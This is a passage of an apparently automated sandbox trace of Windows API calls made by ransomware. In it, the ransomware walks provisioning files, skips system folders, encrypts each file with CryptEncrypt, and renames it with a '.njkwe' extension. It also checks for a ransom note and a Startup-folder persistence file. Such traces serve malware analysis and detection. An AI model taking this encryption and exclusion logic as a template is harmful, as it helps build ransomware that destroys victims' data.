[0078.509] GetProcessHeap () returned 0xbe0000 [0078.509] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.509] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.510] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.510] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.511] GetProcessHeap () returned 0xbe0000 [0078.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.511] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.511] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.511] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.511] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.511] CloseHandle (hObject=0x43c) returned 1 [0078.511] GetProcessHeap () returned 0xbe0000 [0078.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.511] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\348__connections_cellular_sfr (réunion) (france)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\348__Connections_Cellular_SFR (Réunion) (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\348__connections_cellular_sfr (réunion) (france)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.512] GetProcessHeap () returned 0xbe0000 [0078.512] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.512] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cdcae1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cdcae1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cdcae1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", cAlternateFileName="349__C~1.PRO")) returned 1 [0078.512] lstrcmpiW (lpString1="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.512] lstrcmpiW (lpString1="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.512] lstrcmpiW (lpString1="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.513] lstrcmpiW (lpString1="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.513] lstrcmpiW (lpString1="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.513] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml") returned 166 [0078.513] StrStrIW (lpFirst="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.513] lstrcmpW (lpString1="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.513] lstrcmpW (lpString1="349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.513] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\349__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\349__connections_cellular_sfr (réunion) (france)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.513] GetTickCount () returned 0x1153f57 [0078.513] GetTickCount () returned 0x1153f57 [0078.513] GetTickCount () returned 0x1153f57 [0078.513] GetTickCount () returned 0x1153f57 [0078.513] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.513] GetProcessHeap () returned 0xbe0000 [0078.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.513] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0078.515] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.515] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0078.515] GetProcessHeap () returned 0xbe0000 [0078.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.515] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.515] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.515] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.515] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.515] CloseHandle (hObject=0x43c) returned 1 [0078.515] GetProcessHeap () returned 0xbe0000 [0078.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.516] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\349__connections_cellular_sfr (réunion) (france)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\349__Connections_Cellular_SFR (Réunion) (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\349__connections_cellular_sfr (réunion) (france)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.516] GetProcessHeap () returned 0xbe0000 [0078.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.516] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901d57cf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901d57cf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901d57cf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="34__CO~1.PRO")) returned 1 [0078.516] lstrcmpiW (lpString1="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.516] lstrcmpiW (lpString1="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.516] lstrcmpiW (lpString1="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.516] lstrcmpiW (lpString1="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.516] lstrcmpiW (lpString1="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.516] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml") returned 160 [0078.516] StrStrIW (lpFirst="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.516] lstrcmpW (lpString1="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.516] lstrcmpW (lpString1="34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.516] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\34__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\34__connections_cellular_batelco (bahrain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.517] GetTickCount () returned 0x1153f57 [0078.517] GetTickCount () returned 0x1153f57 [0078.517] GetTickCount () returned 0x1153f57 [0078.517] GetTickCount () returned 0x1153f57 [0078.517] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.517] GetProcessHeap () returned 0xbe0000 [0078.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.517] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0078.519] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.519] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0078.519] GetProcessHeap () returned 0xbe0000 [0078.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.519] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.519] CloseHandle (hObject=0x43c) returned 1 [0078.519] GetProcessHeap () returned 0xbe0000 [0078.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.520] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\34__connections_cellular_batelco (bahrain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\34__Connections_Cellular_Batelco (Bahrain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\34__connections_cellular_batelco (bahrain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.520] GetProcessHeap () returned 0xbe0000 [0078.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.520] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cdcae1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cdcae1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cdcae1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", cAlternateFileName="350__C~1.PRO")) returned 1 [0078.520] lstrcmpiW (lpString1="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.520] lstrcmpiW (lpString1="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.520] lstrcmpiW (lpString1="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.520] lstrcmpiW (lpString1="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.520] lstrcmpiW (lpString1="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.520] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml") returned 166 [0078.520] StrStrIW (lpFirst="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.520] lstrcmpW (lpString1="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.521] lstrcmpW (lpString1="350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.521] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\350__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\350__connections_cellular_sfr (réunion) (france)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.521] GetTickCount () returned 0x1153f57 [0078.521] GetTickCount () returned 0x1153f57 [0078.521] GetTickCount () returned 0x1153f57 [0078.521] GetTickCount () returned 0x1153f57 [0078.522] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.522] GetProcessHeap () returned 0xbe0000 [0078.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.522] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0078.523] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.523] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0078.523] GetProcessHeap () returned 0xbe0000 [0078.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.523] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.524] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.524] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.524] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.524] CloseHandle (hObject=0x43c) returned 1 [0078.524] GetProcessHeap () returned 0xbe0000 [0078.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.524] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0078.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\350__connections_cellular_sfr (réunion) (france)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\350__Connections_Cellular_SFR (Réunion) (France)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\350__connections_cellular_sfr (réunion) (france)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.525] GetProcessHeap () returned 0xbe0000 [0078.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.525] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cdcae1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cdcae1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cdcae1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", cAlternateFileName="351__C~1.PRO")) returned 1 [0078.525] lstrcmpiW (lpString1="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.525] lstrcmpiW (lpString1="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.525] lstrcmpiW (lpString1="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.525] lstrcmpiW (lpString1="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.525] lstrcmpiW (lpString1="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.525] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml") returned 166 [0078.525] StrStrIW (lpFirst="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.525] lstrcmpW (lpString1="351__Connections_Cellular_SFR (Réunion) (France)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.525] lstrcmpW 